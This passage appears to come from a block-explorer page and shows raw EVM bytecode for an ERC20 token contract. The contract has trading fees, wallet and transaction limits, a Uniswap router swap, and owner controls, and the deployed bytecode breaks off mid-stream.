ffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612266575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561226f575f90505b5f81156124d85760195f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156122cd57505f601054115b15612397576122fa60646122ec6010548861290590919063ffffffff16565b61297c90919063ffffffff16565b90506010546012548261230d91906137ac565b612317919061381a565b60155f8282546123279190613683565b925050819055506010546013548261233f91906137ac565b612349919061381a565b60165f8282546123599190613683565b925050819055506010546011548261237191906137ac565b61237b919061381a565b60145f82825461238b9190613683565b925050819055506124b5565b60195f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156123ee57505f600c54115b156124b45761241b606461240d600c548861290590919063ffffffff16565b61297c90919063ffffffff16565b9050600c54600e548261242e91906137ac565b612438919061381a565b60155f8282546124489190613683565b92505081905550600c54600f548261246091906137ac565b61246a919061381a565b60165f82825461247a9190613683565b92505081905550600c54600d548261249291906137ac565b61249c919061381a565b60145f8282546124ac9190613683565b925050819055505b5b5f8111156124c9576124c88730836125ac565b5b80856124d5919061384a565b94505b6124e38787876125ac565b505050505b505050565b5f838311158290612534576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252b9190612cce565b60405180910390fd5b505f8385612542919061384a565b9050809150509392505050565b5f80828461255d9190613683565b9050838110156125a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612599906138c7565b60405180910390fd5b8091505092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361261a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612611906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612688576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161267f90613542565b60405180910390fd5b6126938383836129c5565b6126fc81604051806060016040528060268152602001613b1c602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061278b815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516128289190612e9e565b60405180910390a3505050565b5f61283f30610c7f565b9050601460095461285091906137ac565b81111561286957601460095461286691906137ac565b90505b81811115612875578190505b5f81111561288757612886816129ca565b5b5f6015819055505f6014819055505f60168190555060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015612900573d5f803e3d5ffd5b505050565b5f808303612915575f9050612976565b5f828461292291906137ac565b9050828482612931919061381a565b14612971576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161296890613955565b60405180910390fd5b809150505b92915050565b5f6129bd83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612bfd565b905092915050565b505050565b5f600267ffffffffffffffff8111156129e6576129e5613973565b5b604051908082528060200260200182016040528015612a145781602001602082028036833780820191505090505b50905030815f81518110612a2b57612a2a6139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612ace573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612af291906139e1565b81600181518110612b0657612b056139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612b6b307f00000000000000000000000000000000000000000000000000000000000000008461189b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612bcc959493929190613ac3565b5f604051808303815f87803b158015612be3575f80fd5b505af1158015612bf5573d5f803e3d5ffd5b505050505050565b5f8083118290612c43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c3a9190612cce565b60405180910390fd5b505f8385612c51919061381a565b9050809150509392505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612ca082612c5e565b612caa8185612c68565b9350612cba818560208601612c78565b612cc381612c86565b840191505092915050565b5f6020820190508181035f830152612ce68184612c96565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612d1b82612cf2565b9050919050565b612d2b81612d11565b8114612d35575f80fd5b50565b5f81359050612d4681612d22565b92915050565b5f819050919050565b612d5e81612d4c565b8114612d68575f80fd5b50565b5f81359050612d7981612d55565b92915050565b5f8060408385031215612d9557612d94612cee565b5b5f612da285828601612d38565b9250506020612db385828601612d6b565b9150509250929050565b5f8115159050919050565b612dd181612dbd565b82525050565b5f602082019050612dea5f830184612dc8565b92915050565b5f60208284031215612e0557612e04612cee565b5b5f612e1284828501612d38565b91505092915050565b5f819050919050565b5f612e3e612e39612e3484612cf2565b612e1b565b612cf2565b9050919050565b5f612e4f82612e24565b9050919050565b5f612e6082612e45565b9050919050565b612e7081612e56565b82525050565b5f602082019050612e895f830184612e67565b92915050565b612e9881612d4c565b82525050565b5f602082019050612eb15f830184612e8f565b92915050565b5f805f60608486031215612ece57612ecd612cee565b5b5f612edb86828701612d38565b9350506020612eec86828701612d38565b9250506040612efd86828701612d6b565b9150509250925092565b5f60ff82169050919050565b612f1c81612f07565b82525050565b5f602082019050612f355f830184612f13565b92915050565b612f4481612d11565b82525050565b5f602082019050612f5d5f830184612f3b565b92915050565b612f6c81612dbd565b8114612f76575f80fd5b50565b5f81359050612f8781612f63565b92915050565b5f8060408385031215612fa357612fa2612cee565b5b5f612fb085828601612d38565b9250506020612fc185828601612f79565b9150509250929050565b5f8060408385031215612fe157612fe0612cee565b5b5f612fee85828601612d38565b9250506020612fff85828601612d38565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061304d57607f821691505b6020821081036130605761305f613009565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61309a602083612c68565b91506130a582613066565b602082019050919050565b5f6020820190508181035f8301526130c78161308e565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f613102601683612c68565b915061310d826130ce565b602082019050919050565b5f6020820190508181035f83015261312f816130f6565b9050919050565b7f54726164696e6720616c726561647920656e61626c65640000000000000000005f82015250565b5f61316a601783612c68565b915061317582613136565b602082019050919050565b5f6020820190508181035f8301526131978161315e565b9050919050565b5f819050919050565b5f6131c16131bc6131b78461319e565b612e1b565b612d4c565b9050919050565b6131d1816131a7565b82525050565b5f60c0820190506131ea5f830189612f3b565b6131f76020830188612e8f565b61320460408301876131c8565b61321160608301866131c8565b61321e6080830185612f3b565b61322b60a0830184612e8f565b979650505050505050565b5f8151905061324481612d55565b92915050565b5f805f6060848603121561326157613260612cee565b5b5f61326e86828701613236565b935050602061327f86828701613236565b925050604061329086828701613236565b9150509250925092565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6132f4602683612c68565b91506132ff8261329a565b604082019050919050565b5f6020820190508181035f830152613321816132e8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613382602483612c68565b915061338d82613328565b604082019050919050565b5f6020820190508181035f8301526133af81613376565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613410602283612c68565b915061341b826133b6565b604082019050919050565b5f6020820190508181035f83015261343d81613404565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61349e602583612c68565b91506134a982613444565b604082019050919050565b5f6020820190508181035f8301526134cb81613492565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61352c602383612c68565b9150613537826134d2565b604082019050919050565b5f6020820190508181035f83015261355981613520565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f613594601683612c68565b915061359f82613560565b602082019050919050565b5f6020820190508181035f8301526135c181613588565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613622603583612c68565b915061362d826135c8565b604082019050919050565b5f6020820190508181035f83015261364f81613616565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61368d82612d4c565b915061369883612d4c565b92508282019050808211156136b0576136af613656565b5b92915050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f6136ea601383612c68565b91506136f5826136b6565b602082019050919050565b5f6020820190508181035f830152613717816136de565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613778603683612c68565b91506137838261371e565b604082019050919050565b5f6020820190508181035f8301526137a58161376c565b9050919050565b5f6137b682612d4c565b91506137c183612d4c565b92508282026137cf81612d4c565b915082820484148315176137e6576137e5613656565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61382482612d4c565b915061382f83612d4c565b92508261383f5761383e6137ed565b5b828204905092915050565b5f61385482612d4c565b915061385f83612d4c565b925082820390508181111561387757613876613656565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f6138b1601b83612c68565b91506138bc8261387d565b602082019050919050565b5f6020820190508181035f8301526138de816138a5565b9050919050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f61393f602183612c68565b915061394a826138e5565b604082019050919050565b5f6020820190508181035f83015261396c81613933565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f815190506139db81612d22565b92915050565b5f602082840312156139f6576139f5612cee565b5b5f613a03848285016139cd565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613a3e81612d11565b82525050565b5f613a4f8383613a35565b60208301905092915050565b5f602082019050919050565b5f613a7182613a0c565b613a7b8185613a16565b9350613a8683613a26565b805f5b83811015613ab6578151613a9d8882613a44565b9750613aa883613a5b565b925050600181019050613a89565b5085935050505092915050565b5f60a082019050613ad65f830188612e8f565b613ae360208301876131c8565b8181036040830152613af58186613a67565b9050613b046060830185612f3b565b613b116080830184612e8f565b969550505050505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220585ae3022fc6a5f9599a77de50d28eb13259afc89c022e42c2d8012b4fbcc07664736f6c63430008190033
Deployed Bytecode
0x608060405260043610610254575f3560e01c80638a8c523c11610138578063b62496f5116100b5578063dd62ed3e11610079578063dd62ed3e14610897578063e2f45605146108d3578063f11a24d3146108fd578063f2fde38b14610927578063f63743421461094f578063f8b45b05146109795761025b565b8063b62496f5146107b5578063bbc0c742146107f1578063c02466681461081b578063c8c8ebe414610843578063d85ba0631461086d5761025b565b80639c3b4fdc116100fc5780639c3b4fdc146106bf5780639fccce32146106e9578063a0d82dc514610713578063a457c2d71461073d578063a9059cbb146107795761025b565b80638a8c523c146106015780638da5cb5b146106175780638ea5220f14610641578063921369131461066b57806395d89b41146106955761025b565b806349bd5a5e116101d1578063715018a611610195578063715018a61461052f578063751039fc146105455780637571336a1461056f57806375f0a874146105975780637bce5a04146105c15780637fa787ba146105eb5761025b565b806349bd5a5e1461044b5780634a62bb65146104755780636a486a8e1461049f5780636ddd1713146104c957806370a08231146104f35761025b565b80631a8145bb116102185780631a8145bb146103555780631f3fed8f1461037f57806323b872dd146103a9578063313ce567146103e5578063395093511461040f5761025b565b806306fdde031461025f578063095ea7b31461028957806310d5de53146102c55780631694505e1461030157806318160ddd1461032b5761025b565b3661025b57005b5f80fd5b34801561026a575f80fd5b506102736109a3565b6040516102809190612cce565b60405180910390f35b348015610294575f80fd5b506102af60048036038101906102aa9190612d7f565b610a33565b6040516102bc9190612dd7565b60405180910390f35b3480156102d0575f80fd5b506102eb60048036038101906102e69190612df0565b610a50565b6040516102f89190612dd7565b60405180910390f35b34801561030c575f80fd5b50610315610a6d565b6040516103229190612e76565b60405180910390f35b348015610336575f80fd5b5061033f610a91565b60405161034c9190612e9e565b60405180910390f35b348015610360575f80fd5b50610369610a9a565b6040516103769190612e9e565b60405180910390f35b34801561038a575f80fd5b50610393610aa0565b6040516103a09190612e9e565b60405180910390f35b3480156103b4575f80fd5b506103cf60048036038101906103ca9190612eb7565b610aa6565b6040516103dc9190612dd7565b60405180910390f35b3480156103f0575f80fd5b506103f9610b7a565b6040516104069190612f22565b60405180910390f35b34801561041a575f80fd5b5061043560048036038101906104309190612d7f565b610b82565b6040516104429190612dd7565b60405180910390f35b348015610456575f80fd5b5061045f610c30565b60405161046c9190612f4a565b60405180910390f35b348015610480575f80fd5b50610489610c54565b6040516104969190612dd7565b60405180910390f35b3480156104aa575f80fd5b506104b3610c66565b6040516104c09190612e9e565b60405180910390f35b3480156104d4575f80fd5b506104dd610c6c565b6040516104ea9190612dd7565b60405180910390f35b3480156104fe575f80fd5b5061051960048036038101906105149190612df0565b610c7f565b6040516105269190612e9e565b60405180910390f35b34801561053a575f80fd5b50610543610cc4565b005b348015610550575f80fd5b50610559610e17565b6040516105669190612dd7565b60405180910390f35b34801561057a575f80fd5b5061059560048036038101906105909190612f8d565b610f06565b005b3480156105a2575f80fd5b506105ab610ff4565b6040516105b89190612f4a565b60405180910390f35b3480156105cc575f80fd5b506105d5611019565b6040516105e29190612e9e565b60405180910390f35b3480156105f6575f80fd5b506105ff61101f565b005b34801561060c575f80fd5b506106156110e5565b005b348015610622575f80fd5b5061062b6112e6565b6040516106389190612f4a565b60405180910390f35b34801561064c575f80fd5b5061065561130e565b6040516106629190612f4a565b60405180910390f35b348015610676575f80fd5b5061067f611333565b60405161068c9190612e9e565b60405180910390f35b3480156106a0575f80fd5b506106a9611339565b6040516106b69190612cce565b60405180910390f35b3480156106ca575f80fd5b506106d36113c9565b6040516106e09190612e9e565b60405180910390f35b3480156106f4575f80fd5b506106fd6113cf565b60405161070a9190612e9e565b60405180910390f35b34801561071e575f80fd5b506107276113d5565b6040516107349190612e9e565b60405180910390f35b348015610748575f80fd5b50610763600480360381019061075e9190612d7f565b6113db565b6040516107709190612dd7565b60405180910390f35b348015610784575f80fd5b5061079f600480360381019061079a9190612d7f565b6114a3565b6040516107ac9190612dd7565b60405180910390f35b3480156107c0575f80fd5b506107db60048036038101906107d69190612df0565b6114c0565b6040516107e89190612dd7565b60405180910390f35b3480156107fc575f80fd5b506108056114dd565b6040516108129190612dd7565b60405180910390f35b348015610826575f80fd5b50610841600480360381019061083c9190612f8d565b6114f0565b005b34801561084e575f80fd5b5061085761162c565b6040516108649190612e9e565b60405180910390f35b348015610878575f80fd5b50610881611632565b60405161088e9190612e9e565b60405180910390f35b3480156108a2575f80fd5b506108bd60048036038101906108b89190612fcb565b611638565b6040516108ca9190612e9e565b60405180910390f35b3480156108de575f80fd5b506108e76116ba565b6040516108f49190612e9e565b60405180910390f35b348015610908575f80fd5b506109116116c0565b60405161091e9190612e9e565b60405180910390f35b348015610932575f80fd5b5061094d60048036038101906109489190612df0565b6116c6565b005b34801561095a575f80fd5b50610963611888565b6040516109709190612e9e565b60405180910390f35b348015610984575f80fd5b5061098d61188e565b60405161099a9190612e9e565b60405180910390f35b6060600380546109b290613036565b80601f01602080910402602001604051908101604052809291908181526020018280546109de90613036565b8015610a295780601f10610a0057610100808354040283529160200191610a29565b820191905f5260205f20905b815481529060010190602001808311610a0c57829003601f168201915b5050505050905090565b5f610a46610a3f611894565b848461189b565b6001905092915050565b6018602052805f5260405f205f915054906101000a900460ff1681565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b5f600254905090565b60155481565b60145481565b5f610ab2848484611a5e565b610b6f84610abe611894565b610b6a85604051806060016040528060288152602001613b426028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b21611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b600190509392505050565b5f6009905090565b5f610c26610b8e611894565b84610c218560015f610b9e611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b61189b565b6001905092915050565b7f00000000000000000000000050dad8b2dc048f540f50539bbf77c6f05b64ee3781565b600b5f9054906101000a900460ff1681565b60105481565b600b60029054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610ccc611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d51906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f60055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f610e20611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610eae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea5906130b0565b60405180910390fd5b5f600b5f6101000a81548160ff0219169083151502179055505f600c819055505f600d819055505f600e819055505f600f819055505f6010819055505f6011819055505f6012819055505f6013819055506001905090565b610f0e611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f93906130b0565b60405180910390fd5b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d5481565b6110276112e6565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461105d575f80fd5b5f471161109f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109690613118565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f193505050501580156110e2573d5f803e3d5ffd5b50565b6110ed611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461117b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611172906130b0565b60405180910390fd5b600b60019054906101000a900460ff16156111cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c290613180565b60405180910390fd5b6111f7307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d5f1961189b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d719473061123e30610c7f565b5f806112486112e6565b426040518863ffffffff1660e01b815260040161126a969594939291906131d7565b60606040518083038185885af1158015611286573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906112ab919061324a565b5050506001600b60016101000a81548160ff0219169083151502179055506001600b60026101000a81548160ff021916908315150217905550565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b60606004805461134890613036565b80601f016020809104026020016040519081016040528092919081815260200182805461137490613036565b80156113bf5780601f10611396576101008083540402835291602001916113bf565b820191905f5260205f20905b8154815290600101906020018083116113a257829003601f168201915b5050505050905090565b600f5481565b60165481565b60135481565b5f6114996113e7611894565b8461149485604051806060016040528060258152602001613b6a6025913960015f611410611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b6001905092915050565b5f6114b66114af611894565b8484611a5e565b6001905092915050565b6019602052805f5260405f205f915054906101000a900460ff1681565b600b60019054906101000a900460ff1681565b6114f8611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611586576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161157d906130b0565b60405180910390fd5b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516116209190612dd7565b60405180910390a25050565b60085481565b600c5481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60095481565b600e5481565b6116ce611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461175c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611753906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036117ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117c19061330a565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a38060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60125481565b600a5481565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611909576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190090613398565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611977576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196e90613426565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611a519190612e9e565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611acc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac3906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611b3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b3190613542565b60405180910390fd5b5f8103611b5157611b4c83835f6125ac565b6124e8565b600b5f9054906101000a900460ff161561203557611b6d6112e6565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bdb5750611bab6112e6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c1357505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c4d575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c665750600560149054906101000a900460ff16155b1561203457600b60019054906101000a900460ff16611d5a5760175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611d1a575060175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611d59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d50906135aa565b60405180910390fd5b5b60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611df7575060185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611e9e57600854811115611e41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e3890613638565b60405180910390fd5b600a54611e4d83610c7f565b82611e589190613683565b1115611e99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e9090613700565b60405180910390fd5b612033565b60195f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611f3b575060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f8a57600854811115611f85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f7c9061378e565b60405180910390fd5b612032565b60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661203157600a54611fe483610c7f565b82611fef9190613683565b1115612030576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161202790613700565b60405180910390fd5b5b5b5b5b5b5f61203f30610c7f565b90505f8082101590508080156120615750600b60029054906101000a900460ff165b801561207a5750600560149054906101000a900460ff16155b80156120cd575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612120575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612173575060175f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156121b7576001600560146101000a81548160ff02191690831515021790555061219c83612835565b5f600560146101000a81548160ff0219169083151502179055505b5f600560149054906101000a900460ff1615905060175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612266575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561226f575f90505b5f81156124d85760195f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156122cd57505f601054115b15612397576122fa60646122ec6010548861290590919063ffffffff16565b61297c90919063ffffffff16565b90506010546012548261230d91906137ac565b612317919061381a565b60155f8282546123279190613683565b925050819055506010546013548261233f91906137ac565b612349919061381a565b60165f8282546123599190613683565b925050819055506010546011548261237191906137ac565b61237b919061381a565b60145f82825461238b9190613683565b925050819055506124b5565b60195f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156123ee57505f600c54115b156124b45761241b606461240d600c548861290590919063ffffffff16565b61297c90919063ffffffff16565b9050600c54600e548261242e91906137ac565b612438919061381a565b60155f8282546124489190613683565b92505081905550600c54600f548261246091906137ac565b61246a919061381a565b60165f82825461247a9190613683565b92505081905550600c54600d548261249291906137ac565b61249c919061381a565b60145f8282546124ac9190613683565b925050819055505b5b5f8111156124c9576124c88730836125ac565b5b80856124d5919061384a565b94505b6124e38787876125ac565b505050505b505050565b5f838311158290612534576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252b9190612cce565b6040518091039